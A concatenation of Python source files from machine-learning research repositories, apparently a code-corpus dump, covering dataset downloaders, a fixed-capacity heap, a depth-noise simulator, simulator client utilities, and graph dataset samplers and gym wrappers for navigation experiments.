save_dir = DATA_DIR if save_dir is None else save_dir
if not os.path.isdir(save_dir):
raise NotADirectoryError('{} is not a directory.'.format(save_dir))
train_source = os.path.join(base_url, train_file)
test_source = os.path.join(base_url, test_file)
train_dest = os.path.join(save_dir, train_file)
test_dest = os.path.join(save_dir, test_file)
def download_file(source, destination):
if not os.path.exists(destination):
print('Downloading from {}...'.format(source))
f, msg = request.urlretrieve(url=source, filename=destination)
print('HTTP response: {}'.format(msg))
return f, msg
else:
print('Found dataset in {}!'.format(destination))
return None
download_file(train_source, train_dest)
download_file(test_source, test_dest)
X_train = np.loadtxt(train_dest)
y_train, X_train = X_train[:, 0].astype(np.int32), X_train[:, 1:]
X_test = np.loadtxt(test_dest)
y_test, X_test = X_test[:, 0].astype(np.int32), X_test[:, 1:]
return X_train, y_train, X_test, y_test
def fetch_kitti(data_dir=None):
if data_dir is None:
data_dir = os.path.join(DATA_DIR, 'kitti_features')
files = ['kitti_all_train.data',
'kitti_all_train.labels',
'kitti_all_test.data',
'kitti_all_test.labels']
for file in files:
if file not in os.listdir(data_dir):
zip_path = os.path.join(data_dir, 'kitti_features.zip')
target_path = os.path.dirname(zip_path)
print("Extracting {} to {}...".format(zip_path, target_path))
with zipfile.ZipFile(zip_path, "r") as zip_ref:
zip_ref.extractall(target_path)
print("Done.")
break
X_train = np.loadtxt(os.path.join(data_dir, files[0]), np.float64, skiprows=1)
y_train = np.loadtxt(os.path.join(data_dir, files[1]), np.int32, skiprows=1)
X_test = np.loadtxt(os.path.join(data_dir, files[2]), np.float64, skiprows=1)
y_test = np.loadtxt(os.path.join(data_dir, files[3]), np.int32, skiprows=1)
return X_train, y_train, X_test, y_test
def fetch_mnist(data_dir=None):
if data_dir is None:
data_dir = os.path.join(DATA_DIR, 'mnist')
url = 'http://yann.lecun.com/exdb/mnist/'
files = ['train-images-idx3-ubyte.gz',
'train-labels-idx1-ubyte.gz',
't10k-images-idx3-ubyte.gz',
't10k-labels-idx1-ubyte.gz']
# Create path if it doesn't exist
os.makedirs(data_dir, exist_ok=True)
# Download any missing files
for file in files:
if file not in os.listdir(data_dir):
request.urlretrieve(url + file, os.path.join(data_dir, file))
print("Downloaded %s to %s" % (file, data_dir))
def _images(path):
"""Return flattened images loaded from local file."""
with gzip.open(path) as f:
# First 16 bytes are magic_number, n_imgs, n_rows, n_cols
pixels = np.frombuffer(f.read(), '>B', offset=16)
return pixels.reshape(-1, 784).astype('float64')
def _labels(path):
with gzip.open(path) as f:
# First 8 bytes are magic_number, n_labels
integer_labels = np.frombuffer(f.read(), '>B', offset=8)
return integer_labels
X_train = _images(os.path.join(data_dir, files[0]))
y_train = _labels(os.path.join(data_dir, files[1]))
X_test = _images(os.path.join(data_dir, files[2]))
y_test = _labels(os.path.join(data_dir, files[3]))
return X_train, y_train, X_test, y_test
```
#### File: ilp/helpers/fc_heap.py
```python
import heapq
import warnings
class FixedCapacityHeap:
"""Implementation of a min-heap with fixed capacity.
The heap contains tuples of the form (edge_weight, node_id),
which means the min. edge weight is extracted first
"""
def __init__(self, lst=None, capacity=10):
self.capacity = capacity
if lst is None:
self.data = []
elif type(lst) is list:
self.data = lst
else:
self.data = lst.tolist()
if lst is not None:
heapq.heapify(self.data)
if len(self.data) > capacity:
msg = 'Input data structure is larger than the queue\'s ' \
'capacity ({}), truncating to smallest ' \
'elements.'.format(capacity)
warnings.warn(msg, UserWarning)
self.data = self.data[:self.capacity]
def push(self, item):
"""Insert an element in the heap if its key is smaller than the current
max-key elements and remove the current max-key element if the new
heap size exceeds the heap capacity
Args:
item (tuple): (edge_weight, node_ind)
Returns:
tuple : (bool, item)
bool: whether the item was actually inserted in the queue
item: another item that was removed from the queue or None if none was removed
"""
inserted = False
removed = None
if len(self.data) < self.capacity:
heapq.heappush(self.data, item)
inserted = True
else:
if item > self.get_min():
removed = heapq.heappushpop(self.data, item)
inserted = True
return inserted, removed
def get_min(self):
"""Return the min-key element without removing it from the heap"""
return self.data[0]
def __len__(self):
return len(self.data)
```
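An illustrative sketch of how the fixed-capacity heap behaves once full (values are arbitrary; assumes the class above is in scope):
```python
heap = FixedCapacityHeap(capacity=3)
for item in [(0.9, 1), (0.1, 2), (0.5, 3), (0.7, 4)]:
    inserted, removed = heap.push(item)
    print(item, '-> inserted:', inserted, 'removed:', removed)
# Once full, (0.7, 4) displaces the current minimum (0.1, 2), so the heap
# ends up holding the three largest-weight entries; get_min() is now (0.5, 3).
print(heap.get_min(), len(heap))
```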
#### File: ilp/helpers/log.py
```python
import sys
import logging
def make_logger(name, path=None):
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
stream_handler = logging.StreamHandler(stream=sys.stdout)
# fmt = '%(asctime)s ' \
fmt = '[%(levelname)-10s] %(name)-10s : %(message)s'
# fmt = '[{levelname}] {name} {message}'
formatter = logging.Formatter(fmt=fmt, style='%')
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
if path:
file_handler = logging.FileHandler(filename=path)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
return logger
``` |
{
"source": "johny-c/minos",
"score": 3
} |
#### File: lib/simdepth/simredwood.py
```python
import numpy as np
import glob
import os
from PIL import Image
from sys import argv
from multiprocessing import Pool
class RedwoodDepthNoiseSim:
def __init__(self, model_filename=None):
self.distmodel = None
if model_filename is not None:
self.loaddistmodel(model_filename)
    def loaddistmodel(self, fname):
        '''Loads distortion model'''
data = np.loadtxt(fname, comments='%', skiprows=5)
dist = np.empty([80, 80, 5])
for y in range(0, 80):
for x in range(0, 80):
idx = (y * 80 + x) * 23 + 3
if (data[idx:idx + 5] < 8000).all():
dist[y, x, :] = 0
else:
dist[y, x, :] = data[idx + 15: idx + 20]
self.distmodel = dist
def distort(self, x, y, z):
i2 = int((z + 1) / 2)
i1 = i2 - 1
a = (z - (i1 * 2 + 1)) / 2
x = int(x / 8)
y = int(y / 6)
f = (1 - a) * self.distmodel[y, x, min(max(i1, 0), 4)] + a * self.distmodel[y, x, min(i2, 4)]
if f == 0:
return 0
else:
return z / f
    def process_image(self, inputpng, outputpng):
        '''Read inputpng, simulate noise on it, and write the result to outputpng'''
# convert from grayscale uint8 to float32
a = np.array(Image.open(inputpng)).astype(np.float32) / 1000.0
self.simulate(a)
Image.fromarray((a * 1000).astype(np.int32)).save(outputpng)
    def simulate(self, buffer):
        '''Simulate noise over the depth values in buffer, modifying it in place'''
a = buffer
b = np.copy(a)
it = np.nditer(a, flags=['multi_index'], op_flags=['writeonly'])
ymax = buffer.shape[0] - 1
xmax = buffer.shape[1] - 1
while not it.finished:
# pixel shuffle
x = min(max(round(it.multi_index[1] + np.random.normal(0, 0.25)), 0), xmax)
y = min(max(round(it.multi_index[0] + np.random.normal(0, 0.25)), 0), ymax)
# downsample
d = b[y - y % 2, x - x % 2]
# distortion
d = self.distort(x, y, d)
# quantization and high freq noise
if d == 0:
it[0] = 0
else:
denom = round((35.130 / d + np.random.normal(0, 0.027778)) * 8)
if denom != 0:
it[0] = 35.130 * 8 / denom
else:
it[0] = d
it.iternext()
return a
if __name__ == "__main__":
if (len(argv) < 4):
print('Usage: {0} <input png dir> <output png dir> <distortion model>'.format(argv[0]))
exit(0)
s = RedwoodDepthNoiseSim()
s.loaddistmodel(argv[3])
ifiles = glob.glob(argv[1] + '/*.png')
ofiles = [argv[2] + '/' + os.path.basename(f) for f in ifiles]
print('Processing %d files' % len(ifiles))
param = zip(ifiles, ofiles)
p = Pool(8)
p.starmap(s.process_image, param)
```
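A small sketch of the distortion step in isolation, using an all-ones stand-in for the Redwood distortion model (the real model file is not included here), which makes `distort` the identity:
```python
import numpy as np
sim = RedwoodDepthNoiseSim()
sim.distmodel = np.ones((80, 80, 5))   # stand-in for loaddistmodel(<model file>)
print(sim.distort(320, 240, 2.5))      # identity model -> 2.5
# With a real model loaded, sim.simulate(depth_array) adds pixel shuffle,
# distortion and quantization noise to a float32 depth image in place.
```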
#### File: lib/util/BackgroundPOpen.py
```python
import subprocess as sp
from threading import Thread
# http://stackoverflow.com/questions/35488927/send-subprocess-popen-stdout-stderr-to-logging-module
class BackgroundPopen(sp.Popen):
@staticmethod
def _proxy_lines(pipe, line_handler, exit_handler=None):
with pipe:
while True:
line = pipe.readline()
if line:
if line_handler is not None:
line_handler(line.rstrip())
else:
break
if exit_handler is not None:
exit_handler()
def __init__(self, name, logger, out_handler, err_handler, *args, **kwargs):
kwargs['stdout'] = sp.PIPE
kwargs['stderr'] = sp.PIPE
super(self.__class__, self).__init__(*args, **kwargs)
self.name = name
self._logger = logger
out_exit_handler = None
err_exit_handler = None
if logger is not None:
out_exit_handler = lambda: logger.info('Finished %s stdout' % self.name)
if out_handler is None:
out_handler = lambda line: logger.info(line)
err_exit_handler = lambda: logger.info('Finished %s stderr' % self.name)
if err_handler is None:
err_handler = lambda line: logger.error(line)
t = Thread(name=name + '_out', target=self._proxy_lines, args=[self.stdout, out_handler, out_exit_handler])
t.daemon = True
t.start()
self._thread_out = t
t2 = Thread(name=name + '_err', target=self._proxy_lines, args=[self.stderr, err_handler, err_exit_handler])
t2.daemon = True
t2.start()
self._thread_err = t2
def flush(self):
# flush logger
# TODO: this hangs, how to flush stdout and stderr?
# try:
# self.stdout.flush()
# except:
# # pretend nothing happened
# pass
#
# try:
# self.stderr.flush()
# except:
# # pretend nothing happened
# pass
if self._logger is not None:
for handler in self._logger.handlers:
handler.flush()
def close(self):
if self._thread_out is not None:
if self._logger is not None:
self._logger.info('Waiting for %s stdout to finish' % self.name)
self._thread_out.join()
self._thread_out = None
if self._thread_err is not None:
if self._logger is not None:
self._logger.info('Waiting for %s stderr to finish' % self.name)
self._thread_err.join()
self._thread_err = None
self.flush()
def __del__(self):
self.close()
        super(BackgroundPopen, self).__del__()
```
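A usage sketch on a POSIX system (same namespace as the class above); the command and handler bodies are arbitrary:
```python
import logging
logging.basicConfig(level=logging.INFO)
log = logging.getLogger('demo')
proc = BackgroundPopen('demo', log,
                       lambda line: log.info('stdout: %r', line),
                       lambda line: log.error('stderr: %r', line),
                       ['echo', 'hello world'])
proc.wait()    # wait for the child; the reader threads drain stdout/stderr
proc.close()   # join the reader threads and flush the logger handlers
```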
#### File: lib/util/RpcCall.py
```python
import numpy as np
class RpcCall:
""" Super basic RPC Call """
def __init__(self, sio, rpcid, logger):
self.sio = sio
self.id = rpcid
self.logger = logger
self.name = None
self.response = None
self.result = None
self.callback = None
def call(self, name, data=None, callback=None, seconds=None, check_wait=None):
self.name = name
self.callback = callback
#self.logger.info('Call %s emit' % name)
self.sio.emit(name, data, self._handle_response)
#self.logger.info('Call %s waiting...' % name)
if check_wait is not None and seconds is not None:
# loop and wait until check is true or response is received
#self.logger.info('Call %s checked waiting %d ...' % (name, seconds))
while self.response is None and check_wait() and self.sio.connected:
self.sio.wait_for_callbacks(seconds=seconds) # wait for response
else:
#self.logger.info('Call %s waiting %d ...' % (name, seconds))
self.sio.wait_for_callbacks(seconds=seconds) # wait for response
#self.logger.info('Call %s done' % name)
return self.result
def _parse_array(self, array):
# TODO: Handle endianness correctly
datatype = array.get('datatype')
data = array.get('data')
if datatype == 'int8':
dt = np.dtype('i1')
return np.frombuffer(data, dtype=dt)
elif datatype == 'uint8':
dt = np.dtype('u1')
return np.frombuffer(data, dtype=dt)
elif datatype == 'int16':
dt = np.dtype('i2')
return np.frombuffer(data, dtype=dt)
elif datatype == 'uint16':
dt = np.dtype('u2')
return np.frombuffer(data, dtype=dt)
elif datatype == 'int32':
dt = np.dtype('i4')
return np.frombuffer(data, dtype=dt)
elif datatype == 'uint32':
dt = np.dtype('u4')
return np.frombuffer(data, dtype=dt)
elif datatype == 'float32':
dt = np.dtype('f4')
return np.frombuffer(data, dtype=dt)
elif datatype == 'float64':
dt = np.dtype('f8')
return np.frombuffer(data, dtype=dt)
else:
if self.logger:
self.logger.error('Unknown datatype %s when processing %s' % (datatype, self.name))
return array
def _parse_data(self, value, key=None, parent=None, path=[]):
#if len(path) > 0:
# ('parse_data %s' % path)
if type(value) is dict:
if value.get('type') == 'array' and 'datatype' in value:
# Special array buffer - let's process it!
value = self._parse_array(value)
if parent is not None:
parent[key] = value
else:
for k, v in value.items():
if type(v) is dict or type(v) is list:
self._parse_data(v, key=k, parent=value, path=path + [k])
elif type(value) is list and len(value) > 0:
for k, v in enumerate(value):
if type(v) is dict or type(v) is list:
self._parse_data(v, key=k, parent=value, path=path + [k])
return value
def _handle_response(self, data):
# process things that proclaim themselves to be array with data
self.response = self._parse_data(data)
if self.logger:
if self.response is not None and self.response.get('status') == 'error':
self.logger.error('Error calling %s: %s' % (self.name, self.response.get('message')))
if self.callback is not None:
self.result = self.callback(self.response)
else:
self.result = self.response
```
#### File: lib/util/StateSet.py
```python
import bz2
import csv
import collections.abc
import math
from enum import Enum
class Select(Enum):
FIRST = 'first'
RANGE_KEY = 'range_key'
RANGE_VALUE = 'range_value'
class SelectPolicy:
def __init__(self, policy, field=None):
self.policy = policy
self.field = field
class StateSet:
""" Wrapper for set of episode val/test states """
def __init__(self, scenes_file=None, states_files=None,
scene_filter=None, episode_filter=None, max_states_per_scene=None,
select_policy=SelectPolicy(Select.FIRST)):
self.states = []
self.scenes = []
self.scenes_by_id = {}
self.states_by_scene = {}
self.select_policy = select_policy
if scenes_file:
self._load_scenes(scenes_file, scene_filter)
if states_files:
if type(states_files) is str:
self._load_states(states_files, max_states_per_scene, episode_filter)
            elif isinstance(states_files, collections.abc.Iterable):
for states_file in states_files:
self._load_states(states_file, max_states_per_scene, episode_filter)
self._embed_states_in_scenes()
def get_splits(self, max_states_per_scene=None):
"""Get dictionary of StateSets keyed by scene 'set' i.e. dataset split"""
scenes_by_split = {}
for scene in self.scenes:
scenes_by_split.setdefault(scene['set'], []).append(scene)
state_sets_dict = {}
for split, scenes in scenes_by_split.items():
ss = StateSet()
ss._populate_from_lists(scenes, self.states_by_scene, max_states_per_scene)
state_sets_dict[split] = ss
return state_sets_dict
def get_scenes(self):
return self.scenes
def get_states(self):
return self.states
def get_states_by_scene_id(self, scene_id):
return self.states_by_scene[scene_id]
def _select_n_states(self, states, n):
# Select n states from big list of states
policy = self.select_policy.policy
field = self.select_policy.field
if n is not None and n < len(states):
if policy == Select.FIRST:
if field is not None:
# sort by field
states = sorted(states, key=lambda x: x[field])
return states[:n]
elif policy == Select.RANGE_KEY:
# sort by field
states = sorted(states, key=lambda x: x[field])
# select by evenly dividing indices
r = len(states)/float(n)
selected = []
for i in range(n):
si = int(math.floor(math.ceil(r*i)/2))
selected.append(states[si])
return selected
elif policy == Select.RANGE_VALUE:
# sort by field and get range (value)
states = sorted(states, key=lambda x: x[field])
fmin = states[0][field]
fmax = states[-1][field]
# print('Range is %f to %f' % (fmin,fmax))
# from range, divide up into n buckets
r = (fmax-fmin)/float(n)
buckets = []
for i in range(n):
buckets.append([])
for state in states:
bi = int(min(math.ceil((state[field] - fmin)/r), n-1))
buckets[bi].append(state)
# make sure all buckets have something
for i, bucket in enumerate(buckets):
if len(bucket) == 0:
# print('Nothing in bucket %d' % i)
# still some from other buckets
pi = max(i-1, 0)
ni = min(i+1, n-1)
nlen = len(buckets[ni])
plen = len(buckets[pi])
if nlen > plen:
# take half from bucket[ni] and put in current bucket
k = math.floor(nlen/2)
buckets[i] = buckets[ni][:k]
buckets[ni] = buckets[ni][k:]
else:
k = math.floor(plen/2)
buckets[i] = buckets[pi][:k]
buckets[pi] = buckets[pi][k:]
selected = []
for bucket in buckets:
bii = math.floor(len(bucket)/2)
selected.append(bucket[bii])
return selected
else:
raise ValueError('Unsupported select_policy ' + policy)
else:
return states
def _populate_from_lists(self, my_scenes, my_states_by_scene, max_states_per_scene):
self.scenes = my_scenes
for scene in my_scenes:
scene_id = scene['id']
self.scenes_by_id[scene_id] = scene
if scene_id in my_states_by_scene:
my_states = self._select_n_states(my_states_by_scene[scene_id], max_states_per_scene)
self.states_by_scene[scene_id] = my_states
self.states += my_states
def _load_scenes(self, filename, scene_filter):
with bz2.open(filename, 'rt') if filename.endswith('bz2') else open(filename) as f:
reader = csv.DictReader(f)
self.scenes = []
for r in reader:
for v in ['nrooms', 'nobjects', 'nlevels']:
if v in r:
r[v] = int(r[v])
for v in ['dimX', 'dimY', 'dimZ', 'floorArea']:
if v in r:
r[v] = float(r[v])
if scene_filter and not scene_filter(r):
continue
self.scenes.append(r)
self.scenes_by_id[r['id']] = r
self.scenes.sort(key=lambda x: x['nobjects'])
def _load_states(self, filename, max_states_per_scene, state_filter):
with bz2.open(filename, 'rt') if filename.endswith('bz2') else open(filename) as f:
reader = csv.DictReader(f)
all_states = [r for r in reader]
# Convert scene state and group by sceneId
counter = 0
for r in all_states:
for v in ['startX', 'startY', 'startZ', 'startAngle', 'goalX', 'goalY', 'goalZ', 'dist', 'pathDist']:
r[v] = float(r[v]) if v in r else None
for v in ['episodeId', 'pathNumDoors', 'pathNumRooms', 'level']:
r[v] = int(r[v]) if v in r else None
scene_id = r['sceneId']
scene_states = self.states_by_scene.setdefault(scene_id, [])
rec = {
'episode_id': counter,
'scene_id': r['sceneId'],
'room_id': r['roomId'],
'start': {'position': [r['startX'], r['startY'], r['startZ']], 'angle': r['startAngle']},
'goal': {'id': r['goalObjectId'], 'position': [r['goalX'], r['goalY'], r['goalZ']]},
'dist': r['dist']
}
for k in ['pathDist', 'pathNumRooms', 'pathRoomIds', 'pathNumDoors', 'pathDoorIds', 'level']:
if k in r:
rec[k] = r[k]
if not state_filter or state_filter(rec):
scene_states.append(rec)
counter = counter + 1
# Filter down to states per scene and create big list of all scenes
states = []
for scene_id, scene_states in self.states_by_scene.items():
self.states_by_scene[scene_id] = self._select_n_states(scene_states, max_states_per_scene)
states += self.states_by_scene[scene_id]
self.states = states
def _embed_states_in_scenes(self):
for state in self.states:
scene_id = state['scene_id']
if scene_id in self.scenes_by_id:
self.scenes_by_id[scene_id].setdefault('states', []).append(state)
scenes_with_no_states = []
for i, scene in enumerate(self.scenes):
if 'states' not in scene or len(scene['states']) == 0:
scenes_with_no_states.append(scene['id'])
del self.scenes_by_id[scene['id']]
self.scenes = [s for s in self.scenes if s['id'] not in scenes_with_no_states]
#print('Removed scenes with no episode states: ' + ','.join(scenes_with_no_states))
def main():
import argparse
# Argument processing
parser = argparse.ArgumentParser(description='Load state set')
parser.add_argument('-n', '--limit',
type=int,
help='Number of states per scene')
parser.add_argument('--select',
default=Select.FIRST,
type=Select,
help='Number of states per scene')
parser.add_argument('--field',
default=None,
help='Field to use for selection')
parser.add_argument('--scenes',
type=str,
default=None,
help='Scenes file to load')
parser.add_argument('input',
help='Input file to load')
args = parser.parse_args()
state_set = StateSet(scenes_file=args.scenes,
states_files=args.input,
max_states_per_scene=args.limit,
select_policy=SelectPolicy(args.select, args.field))
for state in state_set.states:
print(state)
if __name__ == "__main__":
main()
```
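A quick sketch of the selection policies on synthetic episode states (run with the module above in scope; only the 'dist' field matters here):
```python
states = [{'episode_id': i, 'dist': float(i)} for i in range(20)]
ss = StateSet()  # empty set, used only for its selection logic
ss.select_policy = SelectPolicy(Select.RANGE_VALUE, field='dist')
print([s['dist'] for s in ss._select_n_states(states, 5)])  # spread over the value range
ss.select_policy = SelectPolicy(Select.FIRST, field='dist')
print([s['dist'] for s in ss._select_n_states(states, 5)])  # the 5 smallest 'dist' values
```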
#### File: minos/tools/console_client.py
```python
import argparse
import curses
import math
import numpy as np
import traceback
from minos.config.sim_args import parse_sim_args
from minos.lib import common
from minos.lib.Simulator import Simulator
def _interactive_loop(stdscr, sim, scene_ids, scene_index):
common.attach_exit_handler(sim)
stdscr.timeout(1000) # Set timeout to 1 second before running loop again
curses.cbreak()
stdscr.keypad(1)
    stdscr.addstr(0, 10, "Interactive mode (IJKL + Arrows). Hit 'q' to quit")
stdscr.refresh()
stdscr.move(1, 15)
action_strength = 1 # Acceleration multiplier for actions
look_angle = math.radians(15) # Look up/down increment in radians
print('IJKL+Arrows = move agent, N = next_scene, Q = quit, other keys = idle')
while sim.running:
key = stdscr.getch()
if key < 0:
continue # check if we should exit
elif key == ord('q'):
break
action = {'name': 'idle', 'strength': action_strength, 'angle': look_angle}
stdscr.clrtobot()
stdscr.refresh()
if key == ord('i'):
stdscr.addstr(1, 20, 'forward ')
action['name'] = 'forwards'
elif key == ord('k'):
stdscr.addstr(1, 20, 'backward ')
action['name'] = 'backwards'
elif key == ord('j'):
stdscr.addstr(1, 20, 'turn_left ')
action['name'] = 'turnLeft'
elif key == ord('l'):
stdscr.addstr(1, 20, 'turn_right ')
action['name'] = 'turnRight'
elif key == ord('n'):
scene_index = (scene_index + 1) % len(scene_ids)
stdscr.addstr(1, 20, 'next_scene loading %s ...' % scene_ids[scene_index])
sim.set_scene(scene_ids[scene_index])
stdscr.refresh()
sim.start()
stdscr.addstr(1, 20, 'next_scene %s' % scene_ids[scene_index])
stdscr.clrtoeol()
stdscr.refresh()
elif key == ord('r'):
sim.restart(randomize_ports=True)
elif key == curses.KEY_LEFT:
stdscr.addstr(1, 20, 'strafe_left ')
action['name'] = 'strafeLeft'
elif key == curses.KEY_RIGHT:
stdscr.addstr(1, 20, 'strafe_right ')
action['name'] = 'strafeRight'
elif key == curses.KEY_UP:
stdscr.addstr(1, 20, 'look_up ')
action['name'] = 'lookUp'
elif key == curses.KEY_DOWN:
stdscr.addstr(1, 20, 'look_down ')
action['name'] = 'lookDown'
else:
stdscr.addstr(1, 20, 'idling ')
action['name'] = 'idle'
stdscr.clrtobot()
stdscr.move(1, 15)
stdscr.refresh()
response = sim.step(action, 1)
observation = response.get('observation') if response is not None else None
if observation is not None:
nrow = 3
simple_observations = {k:v for k,v in observation.items() if k not in ['measurements', 'sensors']}
dicts = [simple_observations, observation.get('measurements'), observation.get('sensors')]
for d in dicts:
for k, v in d.items():
if type(v) is not dict:
info = '%s: %s' % (k,v)
stdscr.addstr(nrow, 20, info[:75] + (info[75:] and '..'))
nrow += 1
else:
stdscr.addstr(nrow, 20, '%s: %s' % (k, str({i: v[i] for i in v if type(v[i]) is not bytearray and type(v[i]) is not np.ndarray})))
nrow += 1
stdscr.move(1, 15)
def interactive_loop(sim, scene_ids, scene_index):
def run_loop(stdscr):
_interactive_loop(stdscr, sim, scene_ids, scene_index)
curses.wrapper(run_loop)
print('Thank you for playing - Goodbye!')
def main():
parser = argparse.ArgumentParser(description='Simulator console client')
args = parse_sim_args(parser)
sim = Simulator(vars(args))
try:
print('Starting simulator...')
if sim.start():
print('Simulator started.')
interactive_loop(sim, args.scene_ids, 0)
except:
traceback.print_exc()
print('Error running simulator. Aborting.')
if sim is not None:
sim.kill()
del sim
if __name__ == "__main__":
main()
``` |
{
"source": "johny-c/noge",
"score": 3
} |
#### File: noge/noge/data_loaders.py
```python
import numpy as np
import torch.utils.data as tud
from sklearn.model_selection import train_test_split
from noge.constants import REAL_DATASETS, PLACES, DATA_DIR
from xlog.utils import load_pickle
class GraphDataset(tud.Dataset):
def __init__(self, graphs, mazes=None):
self.graphs = graphs
self.mazes = mazes
self.num_nodes_per_graph = np.array([G.number_of_nodes() for G in graphs], dtype=int)
self.num_edges_per_graph = np.array([G.number_of_edges() for G in graphs], dtype=int)
n_graphs = len(graphs)
self._pairs = [(g, s) for g in range(n_graphs) for s in graphs[g].nodes]
graph_idx, sources = zip(*self._pairs)
self.samples_graph_idx = np.array(graph_idx)
self._samples_sources = np.array(sources)
def __len__(self):
return len(self._pairs)
def __getitem__(self, item):
graph_index, source = self._pairs[item]
graph = self.graphs[graph_index]
sample = dict(graph=graph, source=source)
if self.mazes is not None:
sample.update(maze=self.mazes[graph_index])
return sample
@property
def max_nodes(self):
return max(self.num_nodes_per_graph)
@property
def max_edges(self):
return max(self.num_edges_per_graph)
@property
def num_graphs(self):
return len(self.graphs)
class SubsetSampler(tud.Sampler):
def __init__(self, dataset, seed, num_samples=50):
assert num_samples <= len(dataset)
self.dataset = dataset
self.seed = seed
self.rng = np.random.RandomState(seed=seed)
# for evaluation only choose pairs once (to be consistent across epochs)
n_graphs = len(dataset.graphs)
if n_graphs >= num_samples:
# sample one source node per graph
num_nodes_per_graph = self.dataset.num_nodes_per_graph
indices = []
offset = 0
for num_nodes in num_nodes_per_graph:
# num_nodes = num_nodes_per_graph[g]
index = self.rng.randint(num_nodes)
indices.append(offset + index)
offset += num_nodes
if len(indices) == num_samples:
break
self._indices = indices
else:
# the number of graphs is less than the required num_samples
n_total = len(dataset)
if n_total <= num_samples:
# if the total number of samples is less than or equal to required, use all samples
self._indices = list(range(n_total))
else:
# if the total number of samples is larger than required, sub-sample
self._indices = self.rng.choice(n_total, size=num_samples, replace=False).tolist()
self._indices.sort()
def __iter__(self):
return iter(self._indices)
def __len__(self):
return len(self._indices)
def get_test_loader(dataset, seed, num_samples):
sampler = SubsetSampler(dataset, seed=seed, num_samples=num_samples)
# set batch_size = None to get each sample without a batch dimension
# set collate_fn = identity to not trigger auto_collate which converts to torch types
loader = tud.DataLoader(dataset=dataset, batch_size=None,
collate_fn=lambda x: x, sampler=sampler)
return loader
class BalancedInfiniteRandomSampler:
""" Sample each graph with equal probability (in the limit) """
def __init__(self, dataset, seed, cycle_size=100_000, replace=True):
self.dataset = dataset
self.seed = seed
self.rng = np.random.RandomState(seed=seed)
# each node's weight should be proportional to 1 over the graph size of the node
inverse_graph_sizes = 1. / dataset.num_nodes_per_graph
self.p = inverse_graph_sizes[dataset.samples_graph_idx]
self.p = self.p / self.p.sum()
# self.weights = torch.as_tensor(self.p, dtype=torch.double)
self.cycle_size = cycle_size
self.replacement = replace
def __iter__(self):
while True:
# sample once every `cycle_size` (rng.choice is slow)
indices = self.rng.choice(len(self.dataset), self.cycle_size, self.replacement, p=self.p).tolist()
# items = torch.multinomial(self.weights, self.cycle_size, self.replacement).tolist()
for index in indices:
yield index
def get_train_generator(dataset, seed):
sampler = BalancedInfiniteRandomSampler(dataset, seed)
sampler_iter = iter(sampler)
while True:
index = next(sampler_iter)
sample = dataset[index]
yield sample
def _get_real_graph(dataset):
proc_dir = DATA_DIR / 'osm' / 'processed'
# get place and name
place = PLACES[dataset]
name = place['city'].replace(' ', '')
path_train = proc_dir / f"{name}_train.pkl"
path_test = proc_dir / f"{name}_test.pkl"
train_graph = load_pickle(path_train)
test_graph = load_pickle(path_test)
train_set = GraphDataset([train_graph])
test_set = GraphDataset([test_graph])
return train_set, test_set
def get_datasets(dataset, seed, test_size, val_size=0):
if dataset in REAL_DATASETS:
return _get_real_graph(dataset)
path_graphs = DATA_DIR / f"{dataset}.pkl"
graphs = load_pickle(path_graphs)
graphs_train, graphs_test = train_test_split(graphs, test_size=test_size, random_state=seed)
graphs_val = None
if val_size > 0:
graphs_train, graphs_val = train_test_split(graphs_train, test_size=val_size, random_state=seed)
mazes_train = None
mazes_test = None
mazes_val = None
if dataset in ('maze', 'hypermaze'):
graphs_train, mazes_train = zip(*graphs_train)
graphs_test, mazes_test = zip(*graphs_test)
if graphs_val is not None:
graphs_val, mazes_val = zip(*graphs_val)
train_set = GraphDataset(graphs_train, mazes_train)
test_set = GraphDataset(graphs_test, mazes_test)
if graphs_val is not None:
val_set = GraphDataset(graphs_val, mazes_val)
return train_set, val_set, test_set
return train_set, test_set
```
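A sketch with synthetic graphs (networkx and torch are already required by the module above); the numbers in the comment follow from the three path graphs chosen here:
```python
import networkx as nx
graphs = [nx.path_graph(n) for n in (5, 8, 13)]
dataset = GraphDataset(graphs)
print(len(dataset), dataset.num_graphs, dataset.max_nodes, dataset.max_edges)  # 26 3 13 12
loader = get_test_loader(dataset, seed=0, num_samples=2)
for sample in loader:
    print(sample['source'], sample['graph'].number_of_nodes())
```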
#### File: noge/envs/dfp_wrapper.py
```python
import gym
import numpy as np
def make_goal(meas_coeffs, temporal_coeffs):
goal = meas_coeffs.reshape(1, -1) * temporal_coeffs.reshape(-1, 1)
return goal.astype(np.float32).ravel()
class TargetMeasEnvWrapper(gym.Wrapper):
def __init__(self, env, meas_coeffs, temporal_coeffs, sample_goals, goal_space='pos_neg'):
assert goal_space in ('pos', 'pos_neg')
assert isinstance(env.observation_space, gym.spaces.Dict), \
f"{self.__class__.__name__} expects dictionary observations."
super().__init__(env)
self.meas_coeffs = meas_coeffs
self.temporal_coeffs = temporal_coeffs
self.sample_goals = sample_goals
self.goal_space = goal_space
self._fixed_goal = make_goal(meas_coeffs, temporal_coeffs)
self._episode_goal = None
spaces = env.observation_space.spaces
g = self._fixed_goal
low = -1 if goal_space == 'pos_neg' else 0
spaces.update(goal=gym.spaces.Box(low=low, high=1, shape=g.shape, dtype=g.dtype))
self.observation_space = gym.spaces.Dict(spaces)
def reset(self, **kwargs):
if self.sample_goals:
self._episode_goal = self._sample_goal() # sample goals during training
else:
self._episode_goal = self._fixed_goal.copy() # set true goal during inference
# obs should be a dict, containing keys 'meas' and 'goal'
obs = self.env.reset(**kwargs)
obs.update(goal=self._episode_goal)
return obs
def _sample_goal(self):
# sample random measurement from [0, 1]
dim_meas = len(self.meas_coeffs)
meas = self.rng.uniform(size=dim_meas)
if self.goal_space == 'pos_neg': # sample from [-1, 1]
meas = 2 * meas - 1
# goal is just a copy of the measurement over the temporal dimension
goal = make_goal(meas, self.temporal_coeffs)
return goal
def step(self, action):
obs, reward, done, info = self.env.step(action)
obs.update(goal=self._episode_goal)
return obs, reward, done, info
```
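A worked example of `make_goal` above: the goal vector is the outer product of measurement and temporal coefficients, flattened with the temporal axis as the slow (row) axis:
```python
import numpy as np
meas_coeffs = np.array([1.0, 0.5])           # weights over measurement dimensions
temporal_coeffs = np.array([0.0, 0.5, 1.0])  # weights over future time offsets
print(make_goal(meas_coeffs, temporal_coeffs))
# -> [0.   0.   0.5  0.25 1.   0.5 ], one (temporal * meas) pair per future offset
```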
#### File: noge/envs/maze_graph.py
```python
import numpy as np
import networkx as nx
